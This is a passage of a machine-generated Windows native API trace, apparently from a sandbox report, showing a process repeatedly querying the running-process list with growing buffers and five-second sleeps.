RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.744] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.759] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.776] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.791] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.806] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.821] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.852] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.868] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.883] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.899] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.915] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.947] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.962] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.977] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.993] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.008] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.024] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.039] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.057] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.081] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 